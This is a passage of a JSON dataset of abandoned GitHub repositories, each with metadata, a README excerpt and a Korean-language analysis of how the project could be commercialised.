type)</a> ⇒ <code>Boolean</code></dt>\n  <dd>\n  <p>检查参数的类型是否符合条件(可根据需求修改)</p>\n</dd>\n  <dt><a href=\"#checkPassw","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"Kreijstal/pony-orbs","github_url":"https://github.com/Kreijstal/pony-orbs","stars":11,"language":"Shell","license":"unknown","abandonment_months":145,"description":"# Pony Orbs 저장소 분석\n\n## 왜 보물인가\n10년 전 만들어진 소수 팬덤 프로젝트로, 특정 커뮤니티에서 독특한 가치를 지닌 니치 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **팬덤 커뮤니티 플랫폼**: My Little Pony 팬들이 캐릭터 정보와 이야기를 공유하는 구독형 사이트\n2. **브라우저 게임/앱**: 수집형 게임이나 대화형 콘텐츠","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"aische/typelevel-examples","github_url":"https://github.com/aische/typelevel-examples","stars":7,"language":"Haskell","license":"NOASSERTION","abandonment_months":103,"description":"# aische/typelevel-examples 분석\n\n## 왜 보물인가\n프로그래밍 언어의 고급 기능을 배우고 싶은 개발자들을 위한 실제 작동하는 예제 모음으로, 이론만으로는 어려운 개념을 직접 보고 따라 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 온라인 프로그래밍 강좌에서 실습 자료로 제공하여 학생들의 이해도 향상\n2","readme_excerpt":"# Haskell Type Level Example Programs\n\nOpen ghci and load the one of the examples:\n\n\n\tstack ghci\n\t\n\tghci> :l src/TypeLevelFibonacci.hs\n\n\nAll programs are written as Types. Given a program called \"Example1\", it can be run by typing\n\n    ghci> :kind! Example1\n    \nIn most cases, for a program called \"Example1\" there is also a value called \"example1\" with type \"Proxy Example1\". It can be run by typing\n\n\tghci> :t example1\n\nFor some examples you might have to increase the reduction depth:\n\n\tghci> :set -freduction-depth=10000\nor\n\n\tghci> :set -freduction-depth=0\n\t\t\nSome examples will not show the fully evaluated result type by using \":kind!\". In these cases a value is defined that uses the result type in its type signature to check if the result type is what we expect.\n\t\n## Fibonacci\n\nCompute fibonacci numbers\n\n\ttype family Fibonacci n where\n\t  Fibonacci n = Fibonacci' n 0 1\n\n\ttype family Fibonacci' n i j where\n\t  Fibonacci' 0 i j = '[]\n\t  Fibonacci' n i j = i ': Fibonacci' (n-1) j (i+j)\n\n\tty","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"surfer8137/speech_to_text_telegram_bot","github_url":"https://github.com/surfer8137/speech_to_text_telegram_bot","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":103,"description":"# Speech to Text Telegram Bot 상용화 분석\n\n## 왜 보물인가\n음성 메시지를 자동으로 텍스트로 변환해주는 기능으로, 일반인도 쉽게 메시지를 빠르게 입력할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **메신저 앱 부가기능 서비스**: 음성-텍스트 변환 API를 카카오톡, 라인 등 메신저 플랫폼에 제공\n2. **기업용 협업 ","readme_excerpt":"# Speech to text telegram bot\n\n<h1> Installation </h1>\n<h3> npm install </h3>\n<h1> Execution </h1>\n<h3> npm start </h3>\n\n<h2> Use </h2>\nSend a voice message to the bot, and wait for a response\n<br>\n*You need a IBM cloud account and a Watson service to run it. https://www.ibm.com/watson/\n<br>\n*You need to introduce your parameters on ./config/config.yml.\n<br>\n*You need to change the model voice depending on the language. By default it is used the spanish voice model.\n<br>","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"facebesidewyj/gulp_demo","github_url":"https://github.com/facebesidewyj/gulp_demo","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":103,"description":"# Gulp Demo 저장소 분석\n\n## 왜 보물인가\n웹사이트 제작 시 반복적인 작업(이미지 압축, 파일 정렬 등)을 자동으로 처리해주는 도구의 실제 사용 예제이며, 이를 통해 웹 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객이 업로드한 웹 이미지를 자동으로 최적화하고 배포하는 이미지 관리 플랫폼\n2.","readme_excerpt":"# 自动化构建工具Gulp\n\n## Gulp介绍\n在前端开发中，用自动化构建工具构建项目框架是必不可少的。使用Gulp可以很方便我们的前端项目构建，它具有如下优点：\n1. 使用gulp.js，你的构建脚本是代码，而不是配置文件；\n2. 使用标准库（node.js standard library）来编写脚本；\n3. 插件都很简单，只负责完成一件事－基本上都是 20 行左右的函数；\n4. 任务都以最大的并发数来执行；\n5. 输入／输出（I/O）是基于“流式”的。\n\n## 项目介绍\n本项目是学习Gulp的使用时，写了一个练手的小Demo，供大家学习。\n\n## 构建步骤\n1. git clone到本地\n2. npm install各种依赖\n3. gulp bulid 打包部署\n4. gulp 开发测试\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"pkjoebinbin/JS-imgLateLoad","github_url":"https://github.com/pkjoebinbin/JS-imgLateLoad","stars":6,"language":"","license":"unknown","abandonment_months":103,"description":"# JS-imgLateLoad 상용화 분석\n\n## 왜 보물인가\n웹사이트의 로딩 속도를 빠르게 만들어주는 기술로, 온라인 쇼핑몰이나 뉴스 사이트 같은 이미지가 많은 서비스의 성능을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 최적화 SaaS**: 온라인 쇼핑몰을 위한 이미지 로딩 솔루션을 월 구독료로 판매\n2. **웹사이트 성능 개선","readme_excerpt":"# JS-imgLateLoad\n原生JS图片延迟加载插件\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/searx","github_url":"https://github.com/Orbiter/searx","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":150,"description":"# Orbiter/searx 분석 보고서\n\n## 왜 보물인가\n사용자가 직접 운영하는 개인 검색엔진을 만들 수 있어서, 구글이나 네이버 같은 대형 검색사이트에 의존하지 않고 자유롭게 정보를 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 기업 내부 검색 도구 (SaaS)**\n회사 직원들이 사내 문서와 데이터만 검색하는 폐쇄형 검색 시스템으로 판매합니다","readme_excerpt":"searx\n=====\n\nA privacy-respecting, hackable [metasearch engine](https://en.wikipedia.org/wiki/Metasearch_engine).\n\nList of [running instances](https://github.com/asciimoo/searx/wiki/Searx-instances).\n\n[![Flattr searx](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/submit/auto?user_id=asciimoo&url=https://github.com/asciimoo/searx&title=searx&language=&tags=github&category=software)\n\n### Features\n\n* Tracking free\n* Modular (see [examples](https://github.com/asciimoo/searx/blob/master/examples))\n* Parallel queries\n* Supports json output `curl https://searx.0x2a.tk/?format=json&q=[query]`\n* Supports csv output `curl https://searx.0x2a.tk/?format=csv&q=[query]`\n* Opensearch support (you can set as default search engine)\n* Configurable search engines/categories\n\n### Installation\n\n* clone source: `git clone git@github.com:asciimoo/searx.git && cd searx`\n* install dependencies: `pip install -r requirements.txt`\n* edit your [searx/settings.py](https://github.com/ascii","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"zcx2001/aliyun-go","github_url":"https://github.com/zcx2001/aliyun-go","stars":7,"language":"Go","license":"unknown","abandonment_months":103,"description":"# aliyun-go 저장소 분석\n\n## 왜 보물인가\n중국의 주요 클라우드 서비스(알리바바 클라우드)를 한국 개발자도 쉽게 연동할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **중국 시장 진출 SaaS**: 한국 서비스를 중국으로 확장할 때 알리바바 클라우드 인프라와 자동 연동\n2. **자동화 업무 도구**: 중국 업체와의 거래 데이터를 알리바바","readme_excerpt":"# aliyun-go\n通过go语言实现阿里云服务的实现\n\n## 短信服务（dysms）\n```\nsms := dysms.New(\"accessKeyId\", \"accessKeySecret\")\nrequestId, message, bizId, err := sms.SendSms([]string{\"18686861234\", \"18686895678\"},\n    \"xxx\", \"SMS_11221122\",\n    dysms.TemplateParam{\"name\": \"param1\", \"time\": \"param2\"}, \"\")\n```","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"SangShaoYe/kJT","github_url":"https://github.com/SangShaoYe/kJT","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":97,"description":"# kJT 저장소 분석\n\n## 왜 보물인가\n정보가 부족하여 저장소의 구체적인 목적과 가치를 판단하기 어렵습니다. 별점 5개와 2018년 마지막 업데이트로 보아 완성도는 있으나, 현재 유지보수 상태를 확인이 필요합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 팀 내 특정 작업 자동화나 데이터 처리 목적으로 자체 서비스에 통합\n2. **API","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/Test_voice_input","github_url":"https://github.com/Orbiter/Test_voice_input","stars":5,"language":"Java","license":"unknown","abandonment_months":110,"description":"# Orbiter/Test_voice_input 분석\n\n## 왜 보물인가\n음성 입력 기술로 사람들이 손을 쓰지 않고도 기기를 제어할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **음성 비서 SaaS**: 스마트홈이나 자동차용 음성 제어 서비스로 월 구독료 수익화\n2. **고객 콜센터 내부 도구**: 상담사가 통화 중 손으로 기록하지 않고 ","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"webgems/webgems","github_url":"https://github.com/webgems/webgems","stars":5,"language":"","license":"unknown","abandonment_months":61,"description":"# webgems 저장소 분석\n\n## 왜 보물인가\n웹 개발에 자주 쓰이는 유용한 도구나 코드 조각들을 모아둔 창고로, 개발자들의 시간을 아껴주는 참고 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 개발자들이 유용한 코드 스니펫과 도구를 공유하고 검색하는 SaaS 서비스로 운영\n2. **회사 내부 개발 도구 라이브러리**:","readme_excerpt":"# 🚨 REPO MOVED\nwebgems is now back in [lostdesign/webgems](https://github.com/lostdesign/webgems)\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"robotsandcake/homeassistant","github_url":"https://github.com/robotsandcake/homeassistant","stars":5,"language":"","license":"unknown","abandonment_months":62,"description":"# robotsandcake/homeassistant 분석\n\n## 왜 보물인가\n집에 있는 여러 기기(조명, 에어컨, 보안카메라 등)를 한 곳에서 편하게 관리할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 관리 SaaS**: 월 구독료를 받고 누구나 자신의 집 기기를 통합 제어할 수 있는 웹 서비스\n2. **부동산 개발사 내부 도구**:","readme_excerpt":"# Home Assistant Config by [@RobotsandCake](https://github.com/robotsandcake) #\n\n[![GitHub issues](https://img.shields.io/github/issues/robotsandcake/homeassistant)](https://github.com/robotsandcake/homeassistant/issues) [![GitHub stars](https://img.shields.io/github/stars/robotsandcake/homeassistant?style=flat-square)](https://github.com/robotsandcake/homeassistant/stargazers) [![GitHub forks](https://img.shields.io/github/forks/robotsandcake/homeassistant?style=flat-square)](https://github.com/robotsandcake/homeassistant/network) [![GitHub issues](https://img.shields.io/github/issues/robotsandcake/homeassistant)](https://github.com/robotsandcake/homeassistant/issues)[![Twitter](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2Fescapologybb)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Ftwitter.com%2Frobotsandcakes)\n\n\n---\n\nThis README and repository are a work in progress. These [YAML](http://yaml.org) [Home Assistant](https://home-assista","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"SangShaoYe/react-redux","github_url":"https://github.com/SangShaoYe/react-redux","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":104,"description":"# React-Redux 저장소 분석\n\n## 왜 보물인가\n웹사이트의 데이터를 효율적으로 관리하고 업데이트하는 기술로, 대규모 사용자를 처리하는 서비스 구축에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 협업 도구(Notion 같은)의 데이터 동기화 엔진으로 활용\n- **내부 업무 도구**: 기업의 재고 관리, 직원 일","readme_excerpt":"# install\n```bash\nnpm install\n```\n\n# run\n```bash\nwebpack-dev-server\n```\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/Simple-C25K","github_url":"https://github.com/Orbiter/Simple-C25K","stars":5,"language":"Java","license":"unknown","abandonment_months":111,"description":"# Simple-C25K 상용화 분석\n\n## 왜 보물인가\n초보자도 따라할 수 있는 러닝 프로그램을 자동으로 관리해주는 앱으로, 피트니스 시장에서 꾸준히 수요가 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **피트니스 앱 구독 서비스**: 월 4,900원 정도의 가볍고 접근성 높은 러닝 코칭 앱으로 운영\n2. **헬스장·스포츠센터 멤버십**: 기존 회","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Bastiani/graphql-tests","github_url":"https://github.com/Bastiani/graphql-tests","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":103,"description":"# Bastiani/graphql-tests 상용화 분석\n\n## 왜 보물인가\n자동으로 웹 서비스의 데이터 통신 안정성을 검증해주는 테스트 도구로, 개발사들이 버그 없는 서비스를 빠르게 출시할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀에게 월간 구독으로 제공되는 자동 검증 플랫폼 (Slack, Notion처럼 팀 단","readme_excerpt":"[![Build Status](https://travis-ci.org/Bastiani/graphql-tests.svg?branch=master)](https://travis-ci.org/Bastiani/graphql-tests)\n\n# Tests with GraphQL, Jest, Koa\n\nMy first contact with GraphQL, Jest and Koa\n\n## Notes\n\n* babel-preset-es2015 is deprecated instead i use\n  [babel-preset-env](http://babeljs.io/docs/plugins/preset-env/)\n* I use [babel-node](http://babeljs.io/docs/usage/cli/#babel-node) instead of\n  [react-register](http://babeljs.io/docs/usage/babel-register/#top)\n\nThis project is licensed under the MIT License - see the\n[LICENSE.md](LICENSE.md) file for details\n\n## Annotations\n### Links:\n  * [fun fun function](https://www.youtube.com/watch?v=lAJWHHUz8_8)\n  * [graphql-vs-rest-tutorial](https://www.toptal.com/api-development/graphql-vs-rest-tutorial)\n  * [relay-modern](https://facebook.github.io/relay/docs/en/relay-modern.html)\n  * [graphql](http://graphql.org/learn/)\n  * [howtographql](https://www.howtographql.com/)\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"SangShaoYe/XinLangMicroblog","github_url":"https://github.com/SangShaoYe/XinLangMicroblog","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":104,"description":"# XinLangMicroblog 저장소 분석\n\n## 왜 보물인가\n중국 최대 소셜미디어 플랫폼인 웨이보의 데이터를 자동으로 수집하고 분석할 수 있는 도구로, 마케팅·여론조사·트렌드 분석이 필요한 기업들에게 귀중한 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 모니터링 SaaS**: 브랜드 평판 관리 서비스로 제공하여 기업들이 자신의 제품에 대한 웨이","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"MBMIT/interges.github.io","github_url":"https://github.com/MBMIT/interges.github.io","stars":5,"language":"CSS","license":"unknown","abandonment_months":142,"description":"# MBMIT/interges.github.io 분석\n\n## 왜 보물인가\n10년 전 만들어진 오래된 프로젝트로, 현재 유지보수가 거의 이루어지지 않아 실무 활용 가치가 매우 낮습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 팀 내부 문서 공유나 정보 관리 시스템으로 활용 (단, 보안 업데이트 필수)\n2. **교육용 참고 자료**: 웹 개발","readme_excerpt":"interges.github.io\n==================\n\nInterges Website\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"MBMIT/mbmit.github.io","github_url":"https://github.com/MBMIT/mbmit.github.io","stars":5,"language":"CSS","license":"unknown","abandonment_months":102,"description":"# MBMIT/mbmit.github.io 저장소 분석\n\n## 왜 보물인가\n2018년 이후 업데이트가 중단되어 현재 실무에 적용하기 어려운 오래된 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 포트폴리오 웹사이트**: 개발자가 자신의 프로젝트를 정리해 보여주는 기본 페이지로 활용\n2. **기술 문서 공개 사이트**: 팀의 기술 자료나 가이드를 무","readme_excerpt":"## Software & Hardware\r\nWe are experts in developing solutions based on Open Source software and hardware. Our projects range from small to large scale. Using distributed development tools and technologies we develop projects with our pool of developers in Germany, India, Latin America and around the world.\r\n\r\n## Consulting\r\nWith daily new tech developments, opportunities and challenges constantly arise. Our facilitators help you to adapt your standing operations and update processes. We enable you to compete through continuous development. At a start-up to build the business, requires a strong focus on the core idea. We have experience in Asian markets and focus on your goals and traction that result in business growth.\r\n\r\n## Research & Business Development\r\nWe conduct market research throughout Asia, BRIC and EMEA. We develop and implement strategies to approach the market and expand your business. We support you with social media campaigns on the channels that matter to your audienc","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"washingtonstateuniversity/WSU-Accessibility-Collector","github_url":"https://github.com/washingtonstateuniversity/WSU-Accessibility-Collector","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":98,"description":"# WSU-Accessibility-Collector 상용화 분석\n\n## 왜 보물인가\n웹사이트가 장애인도 쉽게 사용할 수 있는지 자동으로 검사해주는 도구로, 기업의 법적 책임을 줄이면서 더 많은 고객에게 서비스를 제공할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 웹사이트 접근성 검사 플랫폼**\n기업이 자신의 웹사이트를 정기적으","readme_excerpt":"# WSU Accessibility Collector\n\nA node script to scan and collect accessibility data for a set of URLs.\n\nWSU Accessibility Collector uses [Pa11y](https://github.com/pa11y/pa11y), which is powered by [HTML CodeSniffer](https://github.com/squizlabs/HTML_CodeSniffer), to check a document's HTML code for accessibility violations per the guidelines provided by [WCAG 2.0 AA](https://www.w3.org/TR/WCAG20/).\n\nData is stored in an Elasticsearch index so that it can be displayed in a dashboard like the [WSU Accessibility Dashboard](https://github.com/washingtonstateuniversity/WSU-A11y-Dashboard).\n\n## Requirements\n\nThis tool works alongside [WSU Web Crawler](https://github.com/washingtonstateuniversity/WSU-Web-Crawler), which harvests URLs and logs them in a separate Elasticsearch index for future processing. This should be setup and URLs should be indexed before the accessibility collector is started.\n\n* Node 7.x or later.\n* Elasticsearch 5.2.x or later.\n\n## Configuration\n\nConfiguration is manage","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"SangShaoYe/AngularJS","github_url":"https://github.com/SangShaoYe/AngularJS","stars":6,"language":"","license":"unknown","abandonment_months":104,"description":"# AngularJS 저장소 분석\n\n## 왜 보물인가\n2017년 이후 업데이트가 중단된 오래된 웹 개발 도구로, 현재는 학습 자료나 레거시 시스템 유지보수 목적으로만 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **레거시 시스템 유지보수 서비스**: 2010년대 초반에 만들어진 AngularJS 기반 웹사이트를 관리하는 기업을 위한 컨설팅\n2. **웹","readme_excerpt":"# Angular-tutorial code by SangJingRui\n\n\n## 控制器\n\n| Controller ||\n| --------- | --------- |\n|[Angular控制器](https://wscats.github.io/angular-tutorial/angular控制器.html)|[Angular表达式](https://wscats.github.io/angular-tutorial/angular表达式.html)|\n|[Angular事件广播](https://wscats.github.io/angular-tutorial/angular事件广播.html)|[Angular基于$window的数据通信](https://wscats.github.io/angular-tutorial/angular基于$window的数据通信.html)|\n|[Angular表达式执行函数](https://wscats.github.io/angular-tutorial/Angular表达式执行方法.html)||\n\n## 双向数据绑定\n| bi-directional data binding |\n| --------- |\n|[Angular的$watch,$apply和$digest](https://wscats.github.io/angular-tutorial/angular的$watch,$apply和$digest.html)|\n\n## 服务\n| Service | |\n| --------- | --------- |\n|[Angular自定义服务的常用方法](https://github.com/Wscats/angular-tutorial/blob/gh-pages/%E5%B8%B8%E7%94%A8%E8%87%AA%E5%AE%9A%E4%B9%89%E6%9C%8D%E5%8A%A1%E6%96%B9%E6%B3%95.md)|[Angular部分服务demo](https://wscats.github.io/angular-tutorial/部分服务demo.html)|\n|[Angular自定义Canvas画图服务](https://wscats.github.io/angul","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"TheMaverickProgrammer/UniformDieCast","github_url":"https://github.com/TheMaverickProgrammer/UniformDieCast","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":91,"description":"# UniformDieCast 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 구조를 간단하게 변환하는 기술로, 소프트웨어 개발에서 반복되는 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 변환 SaaS**: 엑셀이나 데이터베이스 형식을 다양한 형태로 자동 변환하는 웹 서비스\n2. **내부 업무 도구**: 대기업의 여러 시스템 간 데","readme_excerpt":"12/1/2018\n\nDue to feedback about compile-time limitations, the api has been changed since release.\n\nThe api now supports user-defined literals which makes the coding experience even more intuitive.\n\n# UniformDieCast\nProvides chainable and iterable object for uniformly distributed die casts. \nUseful for statistics or table top RPG simulations.\n\n# Signature\n\n## Literal Notation\n(humand readable)\n\n```cpp\nusing namespace die::literal;\ndie::die_cast result = #N_D(int M);\n```\n\n## Regular Notation\n(applicable for run-time)\nSee [Example.cpp](https://github.com/TheMaverickProgrammer/UniformDieCast/blob/master/Example.cpp)\n\n```cpp\ndie::die_cast result = die::cast(int N, int M, int modifier=0);\n```\n\nRolls an _M_ sided die _N_ number of times \n\nThe signature comes from the common convention \"3D8\" meaning \"roll an 8 sided dice 3 times\".\n\n# Throws\n\nBoth _N_ and _M_ must be greater than or equal to 1 otherwise an instance of `std::invalid_argument` is thrown.\n\n# Modifiers\n\nWhat about something like \"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"mitsuhiko/aoc19","github_url":"https://github.com/mitsuhiko/aoc19","stars":5,"language":"Rust","license":"unknown","abandonment_months":78,"description":"# mitsuhiko/aoc19 분석 보고서\n\n## 왜 보물인가\n프로그래밍 경진대회(Advent of Code)의 자동화된 풀이 도구로, 복잡한 문제를 빠르게 해결하는 방법을 보여주는 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 프로그래밍 학원이나 온라인 강의 플랫폼에서 문제 풀이 방법 자동 제시 기능\n2. **기업 내부 도구","readme_excerpt":"# Advent of Code 2019\n\nhttps://adventofcode.com/2019/\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Siujoeng-Lau/Encrypted-DNS","github_url":"https://github.com/Siujoeng-Lau/Encrypted-DNS","stars":5,"language":"","license":"unknown","abandonment_months":36,"description":"# Encrypted-DNS 분석 보고서\n\n## 왜 보물인가\n인터넷 사용 기록을 아무도 볼 수 없도록 암호화하는 기술로, 개인정보 보호가 중요한 현대에 수요가 계속 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인정보 보호 SaaS**: 일반 사용자가 월 구독으로 자신의 인터넷 활동을 비공개로 유지하는 서비스\n2. **기업용 내부 도구**: 직원","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"sw-yx/rincewind","github_url":"https://github.com/sw-yx/rincewind","stars":7,"language":"TypeScript","license":"unknown","abandonment_months":75,"description":"# sw-yx/rincewind 분석 보고서\n\n## 왜 보물인가\n마지막 업데이트가 2020년 3월이라 현재 유지 관리 상태가 불명확하며, 프로젝트의 목적과 기능에 대한 공식 설명이 전혀 없어서 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 프로젝트 설명이 없어 구체적 활용처 파악 불가능합니다.\n**내부 업무 도구**:","readme_excerpt":"# rincewind\n\nRincewind: Create React Apps with Parcel + React + PostCSS (with Tailwind) + TypeScript\n\n[![oclif](https://img.shields.io/badge/cli-oclif-brightgreen.svg)](https://oclif.io)\n[![Version](https://img.shields.io/npm/v/rincewind.svg)](https://npmjs.org/package/rincewind)\n[![CircleCI](https://circleci.com/gh/sw-yx/rincewind/tree/master.svg?style=shield)](https://circleci.com/gh/sw-yx/rincewind/tree/master)\n[![Downloads/week](https://img.shields.io/npm/dw/rincewind.svg)](https://npmjs.org/package/rincewind)\n[![License](https://img.shields.io/npm/l/rincewind.svg)](https://github.com/sw-yx/rincewind/blob/master/package.json)\n[![Netlify Status](https://api.netlify.com/api/v1/badges/88e02ab4-ab2c-4949-8dbe-1afb7f3b2ae6/deploy-status)](https://app.netlify.com/sites/rincewind/deploys)\n[![https://www.netlify.com/img/deploy/button.svg](https://www.netlify.com/img/deploy/button.svg)](https://app.netlify.com/start/deploy?repository=https://github.com/sw-yx/rincewin-demo)\n\n![https://humani","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/yacy-search","github_url":"https://github.com/Orbiter/yacy-search","stars":5,"language":"Python","license":"unknown","abandonment_months":194,"description":"# Orbiter/yacy-search 분석 보고서\n\n## 왜 보물인가\n구글 같은 거대 검색 회사에 의존하지 않고 자체적으로 웹 검색 엔진을 운영할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 내부 검색 서비스**: 회사 내부 문서나 파일을 직원들이 쉽게 찾을 수 있는 검색 시스템 구축\n2. **특정 분야 전문 검색 플랫폼**:","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/yacy_grid_ui","github_url":"https://github.com/Orbiter/yacy_grid_ui","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":106,"description":"# Orbiter/yacy_grid_ui 상품화 분석\n\n## 왜 보물인가\n인터넷 검색 기술을 직접 운영할 수 있는 오픈소스 플랫폼으로, 큰 검색회사에 의존하지 않고 독립적으로 검색 시스템을 구축하고자 하는 조직들의 니즈를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 내부 검색 SaaS**: 대규모 회사의 내부 문서/데이터만 검색하는 폐쇄형","readme_excerpt":"# yacy_webclient_bootstrap\nThis is a YaCy Search Client using Bootstrap which can be used as a template for your own search portal!\n\nThis can be hosted on github pages. Here is the example link to this repository:\nhttp://yacy.github.io/yacy_webclient_bootstrap/\n\nThe search result from the default cofiguration is retrieved either from http://search.yacy.net (the demo portal of YaCy)\nif you open the web pages from a http-hosted location like github pages) or the search results are retrieved from your\nlocal YaCy installation at ```http://localhost:8090``` if you open the pages from a ```file://```-path.\n\nTo run your own search portal with your own search index, just change the ```server``` setting in ```js/setup.js```.\n\nTo download the YaCy search server, go to http://yacy.net\n\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"breatheco-de/exercise-family-static-api","github_url":"https://github.com/breatheco-de/exercise-family-static-api","stars":56,"language":"Python","license":"NOASSERTION","abandonment_months":14,"description":"","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"dmjio/AdventOfCode2018","github_url":"https://github.com/dmjio/AdventOfCode2018","stars":5,"language":"Haskell","license":"unknown","abandonment_months":91,"description":"# AdventOfCode2018 저장소 분석\n\n## 왜 보물인가\n매년 수백만 개발자가 참여하는 '어드벤트 오브 코드' 챌린지의 2018년 풀이 모음으로, 프로그래밍 교육 및 알고리즘 학습 자료로 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 초급자용 코딩 문제 풀이 튜토리얼 영상/글 제작 서비스\n2. **채용 면접 준비","readme_excerpt":"# AdventOfCode2018\nhttps://adventofcode.com/2018\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/processing-android","github_url":"https://github.com/Orbiter/processing-android","stars":5,"language":"Java","license":"unknown","abandonment_months":128,"description":"# Orbiter/processing-android 가치 평가\n\n## 왜 보물인가\n안드로이드 기기에서 이미지나 영상을 빠르고 효율적으로 처리하는 기술로, 모바일 앱 개발자들이 반복적으로 구현해야 하는 복잡한 작업을 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 앱 SaaS**: 스마트폰에서 실시간 필터 적용, 이미지 압축 기능을 제공","readme_excerpt":"Processing for Android\n======================\n\nRepository for all Android-related development for Processing.\n\nWe've moved this out from the main project so that it won't hamper progress on the desktop side, and in the hope that others will be more inclined to help and contribute on this isolated portion of the project.\n\nThis is primarily the source for the Android Mode, with the 'core' library found inside a subfolder of the same name.\n\nPlease, please help us keep this code up to date and debugged by making fixes and submitting your pull requests here. The entire Processing project is developed by a tiny number of people working during their free time, and we could really use the help.\n\nBen Fry  \n21 April 2013\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"Orbiter/search30c3","github_url":"https://github.com/Orbiter/search30c3","stars":5,"language":"","license":"unknown","abandonment_months":151,"description":"# Orbiter/search30c3 분석 보고서\n\n## 왜 보물인가\n2013년 카오스 커뮤니케이션 컨퍼런스의 데이터를 검색할 수 있는 도구로, 역사적 기술 행사의 아카이브 정보를 쉽게 찾아볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **학술 자료 검색 SaaS**: 과거 기술 컨퍼런스 발표 자료와 영상을 한곳에서 검색하는 구독 서비스\n2. **보안 ","readme_excerpt":"","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"MBMIT/MBM-Artwork","github_url":"https://github.com/MBMIT/MBM-Artwork","stars":5,"language":"HTML","license":"unknown","abandonment_months":103,"description":"# MBM-Artwork 저장소 분석\n\n## 왜 보물인가\n미술 작품 관련 데이터를 체계적으로 정리한 자료로, 미술관, 박물관, 갤러리 등에서 소장품 관리 시스템을 구축할 때 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 갤러리와 미술관을 위한 '작품 관리 및 전시 계획 플랫폼'으로 월 구독 모델 운영\n2. **내부","readme_excerpt":"MBM Logo\n\nNotes:\n\nRECREATE\nIf you recreate the logo from the font, please take care of \"Kernel\" (kerneling). The first letter is moved closer to the second letter. The second letter and third letter are even closer together (nearly attached).\n\n-------------------------------------------------------\n\nIn order to install latest version of Inkscape visit 